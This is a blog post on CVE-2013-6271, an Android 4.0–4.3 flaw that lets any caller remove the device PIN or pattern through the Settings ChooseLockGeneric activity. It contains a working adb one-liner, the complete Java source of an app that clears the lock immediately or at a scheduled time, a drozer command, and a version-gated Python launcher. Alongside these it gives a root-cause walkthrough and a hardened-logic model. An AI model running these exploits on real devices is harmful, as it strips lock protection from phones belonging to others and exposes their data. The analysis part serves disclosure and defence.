Android: bypassing the device lock (CVE-2013-6271)
2013-12-02 21:50
Word is that a "no root, no recovery" device-lock vulnerability was published these last few days.
Source: https://cureblog.de/2013/11/cve-2013-6271-remove-device-locks-from-android-phone/
Interested readers can first look at the device-admin documentation: http://developer.android.com/guide/topics/admin/device-admin.html
Further reading on device-lock internals and other ways people have cleared the lock:
http://we.droidiser.com/viewtopic.php?f=21&t=29
http://en.miui.com/thread-5684-1-1.html
http://oscarmini.com/2013/09/locked-out-how-to-bypass-pattern-lock-on-any-android-device.html
http://www.geeknaut.com/bypass-android-pattern-lock-09198931.html
http://forum.xda-developers.com/showthread.php?t=1722950
http://forum.xda-developers.com/showthread.php?t=2225695
http://forum.xda-developers.com/showthread.php?t=1646108
http://forum.xda-developers.com/showthread.php?t=2437946
http://www.morethantechnical.com/2013/01/29/a-creative-way-to-bypass-pattern-lock-on-android/
Affected versions (from the Curesec advisory):
4.0 - vulnerable
4.1 - vulnerable
4.2 - vulnerable
4.3 - vulnerable
4.4 - not vulnerable
1. Test
Try it: first set a device PIN, then run this single command over adb:
    adb shell am start -n com.android.settings/com.android.settings.ChooseLockGeneric --ez confirm_credentials false --ei lockscreen.password_type 0 --activity-clear-task
The device PIN really is gone.
Someone has also packaged this into an app, so adb is no longer needed (CRT-Removelocks.apk; its source code follows).
package com.curesec.android;

import android.app.IntentService;
import android.content.ComponentName;
import android.content.Intent;
import android.os.IBinder;

public class RemoveLocks extends IntentService {

    public RemoveLocks() {
        super("RemoveLocks");
    }

    @Override
    protected void onHandleIntent(Intent intent) {
        removeLocks();
    }

    // Understand this method and you understand the whole thing: this is how the lock disappears.
    private void removeLocks() {
        Intent intent = new Intent();
        // Explicitly target the exported Settings activity that changes the lock type.
        intent.setComponent(new ComponentName("com.android.settings",
                "com.android.settings.ChooseLockGeneric"));
        // Ask it not to confirm the existing PIN/pattern/password first ...
        intent.putExtra("confirm_credentials", false);
        // ... and request quality 0, i.e. PASSWORD_QUALITY_UNSPECIFIED: "the policy has no
        // requirements for the password". That branch makes the activity clear the lock.
        intent.putExtra("lockscreen.password_type", 0);
        // Starting an activity from a Service needs FLAG_ACTIVITY_NEW_TASK.
        intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        startActivity(intent);
    }

    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }
}
package com.curesec.android;

import java.util.Calendar;

import android.app.Activity;
import android.app.AlarmManager;
import android.app.PendingIntent;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.view.Menu;
import android.view.View;
import android.widget.Button;
import android.widget.TimePicker;
import android.widget.Toast;

public class MainActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        Button buttonExecuteNow = (Button) findViewById(R.id.button1);
        Button buttonExecuteLater = (Button) findViewById(R.id.button2);
        TimePicker tp = (TimePicker) findViewById(R.id.timePicker1);
        tp.setIs24HourView(true);
        tp.setCurrentHour(Calendar.getInstance().get(Calendar.HOUR_OF_DAY));

        // "Execute now": schedule the RemoveLocks service for the current time via AlarmManager.
        buttonExecuteNow.setOnClickListener(new View.OnClickListener() {
            public void onClick(View view) {
                Context context = getBaseContext();
                Intent intent = new Intent(context, RemoveLocks.class);
                AlarmManager alarm = (AlarmManager) context.getSystemService(Context.ALARM_SERVICE);
                PendingIntent pending = PendingIntent.getService(context, 0, intent,
                        PendingIntent.FLAG_CANCEL_CURRENT);
                Calendar cal = Calendar.getInstance();
                alarm.set(AlarmManager.RTC_WAKEUP, cal.getTimeInMillis(), pending);
                // Toast duration must be LENGTH_SHORT or LENGTH_LONG, not an arbitrary integer.
                Toast t = Toast.makeText(getBaseContext(), "Removing lock now!", Toast.LENGTH_LONG);
                t.show();
            }
        });

        // "Execute later": the same service, fired at the time chosen in the TimePicker.
        buttonExecuteLater.setOnClickListener(new View.OnClickListener() {
            public void onClick(View view) {
                Context context = getBaseContext();
                Intent intent = new Intent(context, RemoveLocks.class);
                AlarmManager alarm = (AlarmManager) context.getSystemService(Context.ALARM_SERVICE);
                PendingIntent pending = PendingIntent.getService(context, 0, intent,
                        PendingIntent.FLAG_CANCEL_CURRENT);
                Calendar cal = Calendar.getInstance();
                TimePicker tp = (TimePicker) findViewById(R.id.timePicker1);
                cal.set(Calendar.HOUR_OF_DAY, tp.getCurrentHour());
                cal.set(Calendar.MINUTE, tp.getCurrentMinute());
                cal.set(Calendar.SECOND, 0);
                alarm.set(AlarmManager.RTC_WAKEUP, cal.getTimeInMillis(), pending);
                Toast t = Toast.makeText(getBaseContext(),
                        "Removing lock at: " + tp.getCurrentHour() + ":" + tp.getCurrentMinute(),
                        Toast.LENGTH_LONG);
                t.show();
            }
        });
    }

    @Override
    public boolean onCreateOptionsMenu(Menu menu) {
        getMenuInflater().inflate(R.menu.main, menu);
        return true;
    }
}
It can also be verified with drozer (formerly Mercury), which you surely know:
    # Disable all phone locks
    run app.activity.start --component com.android.settings com.android.settings.ChooseLockGeneric --extra boolean confirm_credentials false --extra integer "lockscreen.password_type" 0
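The same launch, scripted. This is an added example written for this page, not the Curesec tool or the CRT-Removelocks app: it builds the adb and drozer invocations above from typed extras, checks the release reported by the device against the 4.0-4.3 range from the advisory before firing, and routes every adb call through an injectable runner so the flow can be exercised with no device attached. The component name and the two extras are the page's; the release gate and the FakeAdb stand-in are my additions.

```python
"""Added example (not from the Curesec post or the CRT-Removelocks app): build the
adb `am start` and drozer invocations from typed extras, gate them on the affected
release range, and drive them through an injectable runner so this runs offline."""
import subprocess

COMPONENT = "com.android.settings/com.android.settings.ChooseLockGeneric"

# Extras from the post: skip the credential prompt, request quality 0 (PASSWORD_QUALITY_UNSPECIFIED).
REMOVE_LOCK_EXTRAS = {"confirm_credentials": False, "lockscreen.password_type": 0}

# Release table from the Curesec advisory: 4.0 through 4.3 vulnerable, fixed in 4.4.
AFFECTED_MIN, FIXED_FROM = (4, 0), (4, 4)


def parse_release(release: str) -> tuple:
    """'4.2.2' -> (4, 2, 2); a non-numeric suffix such as '4.4W' is cut off."""
    parts = []
    for piece in release.strip().split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        if not digits:
            break
        parts.append(int(digits))
    if not parts:
        raise ValueError(f"unparseable ro.build.version.release: {release!r}")
    return tuple(parts)


def is_affected(release: str) -> bool:
    """True only for major.minor inside [4.0, 4.4)."""
    major_minor = (parse_release(release) + (0, 0))[:2]
    return AFFECTED_MIN <= major_minor < FIXED_FROM


def am_extra_args(extras: dict) -> list:
    """Map Python types onto `am start` extra flags: bool -> --ez, int -> --ei, str -> --es.
    bool is checked first because it is a subclass of int."""
    args = []
    for key, value in extras.items():
        if isinstance(value, bool):
            args += ["--ez", key, "true" if value else "false"]
        elif isinstance(value, int):
            args += ["--ei", key, str(value)]
        elif isinstance(value, str):
            args += ["--es", key, value]
        else:
            raise TypeError(f"unsupported extra type for {key}: {type(value).__name__}")
    return args


def adb_am_start(component: str = COMPONENT, extras: dict = REMOVE_LOCK_EXTRAS) -> list:
    """argv for the post's one-liner: adb shell am start -n <component> <extras> --activity-clear-task."""
    return ["adb", "shell", "am", "start", "-n", component] + am_extra_args(extras) + ["--activity-clear-task"]


def drozer_command(extras: dict = REMOVE_LOCK_EXTRAS) -> str:
    """The same launch in drozer console syntax (--extra <type> <key> <value>)."""
    pkg, cls = COMPONENT.split("/")
    parts = ["run", "app.activity.start", "--component", pkg, cls]
    for key, value in extras.items():
        kind = "boolean" if isinstance(value, bool) else "integer" if isinstance(value, int) else "string"
        text = ("true" if value else "false") if isinstance(value, bool) else str(value)
        parts += ["--extra", kind, key, text]
    return " ".join(parts)


def remove_lock_if_affected(run=subprocess.run) -> str:
    """Read ro.build.version.release over adb, then fire the launch only inside the affected range.
    `run` defaults to subprocess.run and is injectable so a fake runner can stand in for a device."""
    probe = run(["adb", "shell", "getprop", "ro.build.version.release"],
                capture_output=True, text=True, check=True)
    release = probe.stdout.strip()
    if not is_affected(release):
        return f"skip: release {release} outside 4.0-4.3"
    run(adb_am_start(), check=True)
    return "sent: " + " ".join(adb_am_start())


class FakeAdb:
    """Offline stand-in for subprocess.run (constructed for this example): answers the getprop
    query with a canned release string and records every argv it is handed."""

    def __init__(self, release: str):
        self.release, self.calls = release, []

    def __call__(self, argv, **kwargs):
        self.calls.append(list(argv))
        is_probe = list(argv[:4]) == ["adb", "shell", "getprop", "ro.build.version.release"]
        return subprocess.CompletedProcess(argv, 0, stdout=self.release + "\n" if is_probe else "", stderr="")


if __name__ == "__main__":
    for rel in ("4.3", "4.4.2"):
        fake = FakeAdb(rel)
        print(rel, "->", remove_lock_if_affected(run=fake), f"({len(fake.calls)} adb call(s))")
```

Against a real device replace the FakeAdb runner with the default subprocess.run; on a 4.4 device the script stops after the getprop probe and never sends the launch, which is the behaviour you want from a test harness that other people will run.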
2. Cause
The class com.android.settings.ChooseLockGeneric lets the user change the device-lock type (password, pattern, even face recognition); before the change the user is supposed to enter the existing credential (PIN, pattern, and so on).
Let's examine the following code extracted from the class:
    // Defaults to needing to confirm credentials
    final boolean confirmCredentials = getActivity().getIntent()
            .getBooleanExtra(CONFIRM_CREDENTIALS, true);
    mPasswordConfirmed = !confirmCredentials;

    if (savedInstanceState != null) {
        mPasswordConfirmed = savedInstanceState.getBoolean(PASSWORD_CONFIRMED);
        mWaitingForConfirmation = savedInstanceState.getBoolean(WAITING_FOR_CONFIRMATION);
        mFinishPending = savedInstanceState.getBoolean(FINISH_PENDING);
    }

    if (mPasswordConfirmed) {
        updatePreferencesOrFinish();
    }
    ......

    private void updatePreferencesOrFinish() {
        Intent intent = getActivity().getIntent();
        int quality = intent.getIntExtra(LockPatternUtils.PASSWORD_TYPE_KEY, -1);
        if (quality == -1) {
            // If caller didn't specify password quality, show UI and allow the user to choose.
            quality = intent.getIntExtra(MINIMUM_QUALITY_KEY, -1);
            MutableBoolean allowBiometric = new MutableBoolean(false);
            quality = upgradeQuality(quality, allowBiometric);
            final PreferenceScreen prefScreen = getPreferenceScreen();
            if (prefScreen != null) {
                prefScreen.removeAll();
            }
            addPreferencesFromResource(R.xml.security_settings_picker);
            disableUnusablePreferences(quality, allowBiometric);
        } else {
            updateUnlockMethodAndFinish(quality, false);
        }
    }
    ......

    void updateUnlockMethodAndFinish(int quality, boolean disabled) {
        // Sanity check. We should never get here without confirming user's existing password.
        if (!mPasswordConfirmed) {
            throw new IllegalStateException("Tried to update password without confirming it");
        }

        final boolean isFallback = getActivity().getIntent()
                .getBooleanExtra(LockPatternUtils.LOCKSCREEN_BIOMETRIC_WEAK_FALLBACK, false);

        quality = upgradeQuality(quality, null);

        if (quality >= DevicePolicyManager.PASSWORD_QUALITY_NUMERIC) {
            int minLength = mDPM.getPasswordMinimumLength(null);
            if (minLength < MIN_PASSWORD_LENGTH) {
                minLength = MIN_PASSWORD_LENGTH;
            }
            final int maxLength = mDPM.getPasswordMaximumLength(quality);
            Intent intent = new Intent().setClass(getActivity(), ChooseLockPassword.class);
            intent.putExtra(LockPatternUtils.PASSWORD_TYPE_KEY, quality);
            intent.putExtra(ChooseLockPassword.PASSWORD_MIN_KEY, minLength);
            intent.putExtra(ChooseLockPassword.PASSWORD_MAX_KEY, maxLength);
            intent.putExtra(CONFIRM_CREDENTIALS, false);
            intent.putExtra(LockPatternUtils.LOCKSCREEN_BIOMETRIC_WEAK_FALLBACK,
                    isFallback);
            if (isFallback) {
                startActivityForResult(intent, FALLBACK_REQUEST);
                return;
            } else {
                mFinishPending = true;
                intent.addFlags(Intent.FLAG_ACTIVITY_FORWARD_RESULT);
                startActivity(intent);
            }
        } else if (quality == DevicePolicyManager.PASSWORD_QUALITY_SOMETHING) {
            Intent intent = new Intent(getActivity(), ChooseLockPattern.class);
            intent.putExtra("key_lock_method", "pattern");
            intent.putExtra(CONFIRM_CREDENTIALS, false);
            intent.putExtra(LockPatternUtils.LOCKSCREEN_BIOMETRIC_WEAK_FALLBACK,
                    isFallback);
            if (isFallback) {
                startActivityForResult(intent, FALLBACK_REQUEST);
                return;
            } else {
                mFinishPending = true;
                intent.addFlags(Intent.FLAG_ACTIVITY_FORWARD_RESULT);
                startActivity(intent);
            }
        } else if (quality == DevicePolicyManager.PASSWORD_QUALITY_BIOMETRIC_WEAK) {
            Intent intent = getBiometricSensorIntent();
            mFinishPending = true;
            startActivity(intent);
        } else if (quality == DevicePolicyManager.PASSWORD_QUALITY_UNSPECIFIED) {
            // lockscreen.password_type = 0 lands here: the existing credential is wiped.
            mChooseLockSettingsHelper.utils().clearLock(false);
            mChooseLockSettingsHelper.utils().setLockScreenDisabled(disabled);
            getActivity().setResult(Activity.RESULT_OK);
            finish();
        } else {
            finish();
        }
    }
The first piece of code lets the caller decide whether the confirmation step for changing the lock mechanism is enabled at all: the confirm_credentials extra defaults to true, but any caller can set it to false, and nothing checks who the caller is.
With confirmation skipped we reach updatePreferencesOrFinish(). If we also supply a password type, the flow continues into updateUnlockMethodAndFinish(), and when that type is PASSWORD_QUALITY_UNSPECIFIED the branch above calls clearLock(false), which effectively unlocks the device. The sanity check on mPasswordConfirmed at the top of updateUnlockMethodAndFinish() does not help, because the same untrusted extra is what set mPasswordConfirmed in the first place.
Crafting those two extras is all the bypass needs.
Set the password quality. The password quality can be one of the following DevicePolicyManager constants:
PASSWORD_QUALITY_ALPHABETIC - the user must enter a password containing at least alphabetic (or other symbol) characters.
PASSWORD_QUALITY_ALPHANUMERIC - the user must enter a password containing at least both numeric and alphabetic (or other symbol) characters.
PASSWORD_QUALITY_NUMERIC - the user must enter a password containing at least numeric characters.
PASSWORD_QUALITY_SOMETHING - the policy requires some kind of password, but doesn't care what it is.
PASSWORD_QUALITY_UNSPECIFIED - the policy has no requirements for the password.
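To see the whole decision path at once, here is an added Python model of the three methods quoted above (onCreate, updatePreferencesOrFinish, updateUnlockMethodAndFinish), written for this page and not taken from AOSP. It runs the vulnerable logic beside a hardened variant in which the confirm_credentials extra is only honoured when the caller is the Settings app itself; that hardened variant expresses the general remediation (key the credential check on the caller's identity, never on a caller-supplied extra) and is my assumption about the shape of a fix, not a transcription of the Android 4.4 change. The min_quality_policy parameter is likewise an assumption: it models upgradeQuality() raising the requested quality to the device-admin minimum, which the page calls but does not show. The constant values are the SDK's DevicePolicyManager values.

```python
"""Added model of ChooseLockGeneric's decision path (not AOSP code): vulnerable behaviour
beside a hardened variant that ties credential confirmation to the caller's identity."""

# DevicePolicyManager password-quality constants (SDK values).
PASSWORD_QUALITY_UNSPECIFIED = 0x0
PASSWORD_QUALITY_BIOMETRIC_WEAK = 0x8000
PASSWORD_QUALITY_SOMETHING = 0x10000
PASSWORD_QUALITY_NUMERIC = 0x20000
PASSWORD_QUALITY_ALPHABETIC = 0x40000
PASSWORD_QUALITY_ALPHANUMERIC = 0x50000

SETTINGS_PKG = "com.android.settings"

# The post's attack intent: skip confirmation, request quality 0.
ATTACK_INTENT = {"confirm_credentials": False, "lockscreen.password_type": PASSWORD_QUALITY_UNSPECIFIED}


def choose_lock_generic(intent: dict, caller: str, hardened: bool,
                        min_quality_policy: int = PASSWORD_QUALITY_UNSPECIFIED) -> str:
    """Return the action the activity ends up taking for one incoming intent.

    intent:  the extras the caller supplied (confirm_credentials, lockscreen.password_type).
    caller:  package name of whoever started the activity.
    hardened: if True, only Settings itself may skip credential confirmation.
    min_quality_policy: assumed device-admin minimum that upgradeQuality() enforces.
    """
    # onCreate: "Defaults to needing to confirm credentials" ...
    confirm_credentials = intent.get("confirm_credentials", True)
    if hardened:
        # Hardened: an extra from an outside caller can never mark the password as confirmed.
        password_confirmed = caller == SETTINGS_PKG and not confirm_credentials
    else:
        # Vulnerable: ANY caller flips the default with one boolean extra.
        password_confirmed = not confirm_credentials

    if not password_confirmed:
        return "confirm_existing_credential"   # user is asked for the current PIN/pattern/password

    # updatePreferencesOrFinish: no quality given -> picker UI, otherwise straight through.
    quality = intent.get("lockscreen.password_type", -1)
    if quality == -1:
        return "show_picker_ui"

    # updateUnlockMethodAndFinish. Its sanity check on mPasswordConfirmed is redundant here,
    # because the same untrusted extra already decided that flag above.
    quality = max(quality, min_quality_policy)        # modelled upgradeQuality()
    if quality >= PASSWORD_QUALITY_NUMERIC:
        return "start_ChooseLockPassword"
    if quality == PASSWORD_QUALITY_SOMETHING:
        return "start_ChooseLockPattern"
    if quality == PASSWORD_QUALITY_BIOMETRIC_WEAK:
        return "start_biometric_setup"
    if quality == PASSWORD_QUALITY_UNSPECIFIED:
        return "lock_cleared"                          # clearLock(false): the lock is gone
    return "finish"


def outcomes(hardened: bool) -> dict:
    """The interesting cases side by side under one policy."""
    return {
        "default_intent_from_app": choose_lock_generic({}, "com.curesec.android", hardened),
        "attack_from_app": choose_lock_generic(ATTACK_INTENT, "com.curesec.android", hardened),
        "attack_from_settings": choose_lock_generic(ATTACK_INTENT, SETTINGS_PKG, hardened),
        "attack_with_dpm_numeric_policy": choose_lock_generic(
            ATTACK_INTENT, "com.curesec.android", hardened, min_quality_policy=PASSWORD_QUALITY_NUMERIC),
    }


if __name__ == "__main__":
    for label, hardened in (("vulnerable", False), ("hardened", True)):
        print(label)
        for name, result in outcomes(hardened).items():
            print(f"  {name:32s} -> {result}")
```

Two things the table makes visible: in the vulnerable model the attack intent clears the lock from any package, while the hardened model sends every outside caller to the confirmation screen regardless of the extras; and, under the assumed upgradeQuality() behaviour, a device-admin policy that already requires a numeric or stronger password turns the attack into a "set a new PIN" screen rather than a cleared lock, which is worth checking on managed fleets before treating the issue as closed.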
3. Impact
1. If the phone is lost, the PIN at least offers some protection; but if the owner had adb debugging enabled, the PIN can be killed this way.
2. From 4.2.2 on there is one more safeguard: adb authentication (the host's RSA key has to be accepted on the device), so running adb against a lost phone is hard.
3. An app can trigger this and clear the device PIN. What are the consequences of that? Haven't figured it out yet!
Next we will systematically analyze the device-lock mechanism and what other methods exist for clearing the lock.
After the movie: a deep, systematic analysis of device lock.